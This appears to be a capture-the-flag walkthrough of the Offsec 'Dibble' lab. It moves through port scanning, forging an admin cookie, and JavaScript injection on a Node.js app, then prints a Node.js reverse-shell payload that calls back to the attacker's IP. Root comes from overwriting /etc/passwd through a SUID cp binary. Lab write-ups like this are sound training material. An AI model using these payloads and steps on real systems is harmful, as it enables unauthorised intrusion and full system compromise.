Skip to main content

Dibble Walkthrough

Platform: Offsec | PG Practice
Difficulty: Intermediate
OS: Linux
Author: Pawan Kumar (Vulntricks)
Date: [04/07/2025]

🛰️ 1. Reconnaissance

Quick Scan using RustScan

We scan using rustscan as this is quick and passing nmap default script scanning and service scanning as well so that it can scan on the identified ports.

$ rustscan -a $IP -- -sV -sC 

PORT      STATE SERVICE REASON         VERSION
21/tcp    open  ftp     syn-ack ttl 61 vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 192.168.45.249
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp    open  ssh     syn-ack ttl 61 OpenSSH 8.3 (protocol 2.0)
| ssh-hostkey: 
|   3072 9d:3f:eb:1b:aa:9c:1e:b1:30:9b:23:53:4b:cf:59:75 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDJQfskNhOndcMLdRllpGbvhSaJBkmwdZnt3n0U7U3XxjpKx/ZUagAkwNTNPooV1Vc10PSdPE1pWMpqEiiHz7+guLRB4SrXsayYx67pZ0yiRrZ7gaxyEMKoI+p9owIt77Q6mG7PDjb5PQCd7G0xYFMCCaNFUpDfzZZUp2RGenL6b/xLSY1g0/Id1c9Q1S2pKsxMmf+TFqvAS6uOjSHY9fMbQesNQ0hZ74hcWooMOARyPTIYsu2/EmFjhz/hWydF2y5yikz96aBmBl6Z4KBVjp9vFHH50BwAMJuXyKMx5yCr4JzEV8RY3D6otNvR/yxuAxGcwffsaY6O1f9K8HyP6mF9J22tuxsRepSQTDUXNAUGeg9RR86RP7EpGkJ+3Y08vFGnsaRUY7w0800mpafyBeQMjO07urK0UuHihOKTRyW0aXsk9W/ruNJkLQNPWuNiZ/R1QCFRICQLJXl6V0nw0sKv7uxdDYO50OyQ3w3T08pazQr8tiuW38YonUwKPU6I6xc=
|   256 cd:dc:05:e6:e3:bb:12:33:f7:09:74:50:12:8a:85:64 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBK9spPy8kad9kuulG4kX03Wofq8wXe6arLeCb41/Nh7xFMtpRGM6zo7A8U3Vatg7bX20jaU43i7uYZyl7IA5dNA=
|   256 a0:90:1f:50:78:b3:9e:41:2a:7f:5c:6f:4d:0e:a1:fa (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJ00KH0CvMHGQmVCsdM6I+93pxC0naR6to6qUq3ZJa4b
80/tcp    open  http    syn-ack ttl 61 Apache httpd 2.4.46 ((Fedora))
| http-robots.txt: 22 disallowed entries 
| /core/ /profiles/ /README.txt /web.config /admin/ 
| /comment/reply/ /filter/tips /node/add/ /search/ /user/register/ 
| /user/password/ /user/login/ /user/logout/ /index.php/admin/ 
| /index.php/comment/reply/ /index.php/filter/tips /index.php/node/add/ 
| /index.php/search/ /index.php/user/password/ /index.php/user/register/ 
|_/index.php/user/login/ /index.php/user/logout/
| http-methods: 
|_  Supported Methods: GET POST HEAD OPTIONS
|_http-title: Home | Hacking Articles
|_http-favicon: Unknown favicon MD5: CF2445DCB53A031C02F9B57E2199BC03
|_http-generator: Drupal 9 (https://www.drupal.org)
|_http-server-header: Apache/2.4.46 (Fedora)
3000/tcp  open  http    syn-ack ttl 61 Node.js (Express middleware)
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
27017/tcp open  mongodb syn-ack ttl 61 MongoDB 4.2.9 4.2.9
| mongodb-info: 
|   MongoDB Build info
|     maxBsonObjectSize = 16777216
|     sysInfo = deprecated
|     versionArray
|       0 = 4
|       3 = 0
|       2 = 9
|       1 = 2
|     ok = 1.0
|     gitVersion = 06402114114ffc5146fd4b55402c96f1dc9ec4b5
|     openssl
|       compiled = OpenSSL 1.0.1e-fips 11 Feb 2013
|       running = OpenSSL 1.0.1e-fips 11 Feb 2013
|     allocator = tcmalloc
|     storageEngines
|       0 = biggie
|       3 = wiredTiger
|       2 = ephemeralForTest
|       1 = devnull
|     version = 4.2.9
|     debug = false
|     buildEnvironment
|       distarch = x86_64
|       cc = /opt/mongodbtoolchain/v3/bin/gcc: gcc (GCC) 8.2.0
|       ccflags = -fno-omit-frame-pointer -fno-strict-aliasing -ggdb -pthread -Wall -Wsign-compare -Wno-unknown-pragmas -Winvalid-pch -Werror -O2 -Wno-unused-local-typedefs -Wno-unused-function -Wno-deprecated-declarations -Wno-unused-const-variable -Wno-unused-but-set-variable -Wno-missing-braces -fstack-protector-strong -fno-builtin-memcmp
|       target_os = linux
|       cxx = /opt/mongodbtoolchain/v3/bin/g++: g++ (GCC) 8.2.0
|       distmod = rhel70
|       target_arch = x86_64
|       cxxflags = -Woverloaded-virtual -Wno-maybe-uninitialized -fsized-deallocation -std=c++17
|       linkflags = -pthread -Wl,-z,now -rdynamic -Wl,--fatal-warnings -fstack-protector-strong -fuse-ld=gold -Wl,--build-id -Wl,--hash-style=gnu -Wl,-z,noexecstack -Wl,--warn-execstack -Wl,-z,relro
|     javascriptEngine = mozjs

Enumeartion

Enumearting port 21

Starting with anonymous login ..

└─$ ftp -A anonymous@$IP   
Connected to 192.168.238.110.
220 (vsFTPd 3.0.3)
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 EPRT command successful. Consider using EPSV.

Nothing found

Enumearting Port 3000

As per the description of the LAB the entry point is the NodeJS website and from the scanning it is pretty clear that this is the one.

Let's enumearte it then.. starting with looking at the website ..

alt text

We see a login portal so we can create a user. test1:test1

creating user gives a cookie alt text

when I login I also see a user level in the cookie : alt text

So when I decode it as base64 I get value as default
alt text

There is a possiblity that if this is a default user then we can change it to admin and perform the tasks only assigned to admin.. We'll take this note and continue our enumeartion.

I tried to log an event however I could not as only admins can log events.. alt text

we can try to modify the cookie value in the burp and see if we can bypass this restriction. alt text

I did it in the repeater of the BurpSuite and changed the user level value to admin and I was able to write the logs. alt text

Now what! 🥲 Can i put some malicious script ? can I do any malicious acitvity ?

Tried creating a webshell using the node js command but failed, however upon looking for that file I get an error. alt text

Clearly displaying a user name benjamin

Initial Access

Now found something interesting putting 2*2 in message box gives out 4 in response, basically executing it. Suspecting javascript is working on the backend. alt text alt text

So we can try putting some javascript command to test the theory.

Found this command for reverse shell in js. Initially I tried with port 4444 and it failed , so chaning it the open port in the system which is port 21, and it worked.

(function(){
  var net = require("net"),
      cp = require("child_process"),
      sh = cp.spawn("/bin/bash", []);
  var client = new net.Socket();
  client.connect(21, "192.168.45.249", function(){
    client.pipe(sh.stdin);
    sh.stdout.pipe(client);
    sh.stderr.pipe(client);
  });
})();

Got reverse shell

alt text

Privilege Escalation

Running linpeas in the machine gives some information however specifically hilights cp command.

alt text

let's try to abuse this suid binary...

Looking into the GTFOBINS I see that we can use this command to write into the files. alt text

We can try to create a new user and write it into the passwd file

Copy the passwd file locally in home or any directory alt text

Create a password using openssl command alt text

make a new user and paste it into the passwd file alt text

we copied our created passwd file and replaced the /etc/passwd file using cp command. alt text

Elevated our privilege.